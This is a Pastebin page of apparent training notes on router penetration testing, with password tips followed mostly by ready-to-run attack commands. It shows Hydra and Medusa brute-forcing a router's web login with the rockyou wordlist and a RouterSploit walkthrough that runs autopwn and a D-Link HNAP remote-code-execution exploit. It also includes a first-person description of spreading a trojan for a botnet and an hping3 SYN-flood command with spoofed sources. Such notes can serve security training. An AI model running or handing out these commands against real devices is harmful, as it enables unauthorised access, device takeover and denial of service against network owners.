Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Router Pentesting
- -----------------
- VAPT - Vulnerability Accessment And Pen Testing
- We also do the same for the routers and networking smart devices. Routers, switches etc etc.....
- 1. Should have a strong password minimum of 16 characters
- 2. Password should be alphanumeric, case sentivie and special characters
- 3. Password should never be a single word like "LuciferMorningStar", it should always be a phrase like "SplinterItIntoThousandsPiecesAndScatterItIntoTheWind"
- 4. Never keep the password like "LoveYouBaby", "IHateYou", "Password", "123456789a"
- There are many scenarios, which we need to consider while pentesting a router.
- 1. Dumbest People ---> Who never change their default username and password, those who never set their router's password.
- http://routerpasswords.com/
- http://192-168-1-1ip.mobi/default-router-passwords-list/
- 2. Little Smart People --> In this scenario, people change their default password.
- 3. More Smart people ---> They change both of the username and password of the router.
- ---> Hydra ---> Demo
- ---> Medusa --> Task for you to do...
- When user name is default but the password is changed by user
- --------------------------------------------------------------
- hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
- hydra --> a brute forcing tool which is used to crack the services ----> ftp, ssh, telnet, http etc etc
- -s ---> port number
- 80 ---> HTTP protocol port number
- -l ---> username
- admin --> default username
- -P --> password dictionary
- /usr/share/wordlists/rockyou.txt ---> dictionary in which my password is stored
- 192.168.0.1 ---> dafault gateway ---> IP Address of the router
- http-get ----> Parameter via which communication occurs---> through which my trnamission of credentials happed
- Where The More Smart People Changed The Username And Password
- -------------------------------------------------------------
- hydra -s 80 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
- To resume hydra session I can type "hydra -R"
- Medusa ---> Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items to some of the key features of this application:
- cvs imap nntp postgres rlogin smtp ssh vmauthd wrapper
- ftp mssql pcanywhere rdp rsh smtp-vrfy svn vnc
- http mysql pop3 rexec smbnt snmp telnet web-form
- medusa -h 192.168.0.1 -U /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -e ns -t 1 -v 5 -f -M http
- 4. Where people are Smartest, they hide the background information of the router's login page.... You will get a prompt, where it will be written: Username :________
- Password :________
- Routersploit-Framework
- ----------------------
- The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
- It consists of various modules that aids penetration testing operations:
- exploits - modules that take advantage of identified vulnerabilities
- creds - modules designed to test credentials against network services
- scanners - modules that check if a target is vulnerable to any exploit
- Download It From
- https://github.com/reverse-shell/routersploit
- Open the terminal, type
- # git clone https://github.com/reverse-shell/routersploit.git
- # cd routersploit
- # pip install -r requirements.txt
- # ./rsf.py
- ______ _ _____ _ _ _
- | ___ \ | | / ___| | | (_) |
- | |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
- | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
- | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
- \_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
- | |
- IoT Exploitation Framework |_|
- Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
- Codename : Bad Blood
- Version : 2.2.1
- Exploits: 123 Scanners: 32 Creds: 13 Payloads: 10
- rsf >
- rsf > use scanners/autopwn
- rsf (AutoPwn) > show options
- rsf (AutoPwn) > set target 192.168.0.1
- rsf (AutoPwn) > show options
- Target options:
- Name Current settings Description
- ---- ---------------- -----------
- target 192.168.0.1 Target IP address e.g. 192.168.1.1
- port 80 Target port
- Module options:
- Name Current settings Description
- ---- ---------------- -----------
- threads 8 Number of threads
- rsf (AutoPwn) > run
- rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
- rsf (D-Link Multi HNAP RCE) >
- rsf (D-Link Multi HNAP RCE) > show options
- Target options:
- Name Current settings Description
- ---- ---------------- -----------
- target Target address e.g. http://192.168.1.1
- port 80 Target Port
- rsf (D-Link Multi HNAP RCE) > set target http://192.168.0.1
- [+] {'target': 'http://192.168.0.1'}
- rsf (D-Link Multi HNAP RCE) > show options
- rsf (D-Link Multi HNAP RCE) > run
- BOTNETS
- -------
- roBOT + NETwork = BOTNET
- I will spread my trojan and the malicious malware, so that I can control the infected peron via my laptop.
- DoS --> Denial Of Services
- When a user is sending huge amount of data packets to the target and slows down the system.
- hping3
- ------
- hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies.
- hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported
- protocols. Using hping3 you are able to perform at least the following stuff:
- - Test firewall rules
- - Advanced port scanning
- - Test net performance using different protocols,
- packet size, TOS (type of service) and fragmentation.
- - Path MTU discovery
- - Transferring files between even really fascist firewall
- rules.
- - Traceroute-like under different protocols.
- - Firewalk-like usage.
- - Remote OS fingerprinting.
- - TCP/IP stack auditing.
- - A lot of others.
- hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.16.79.141
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement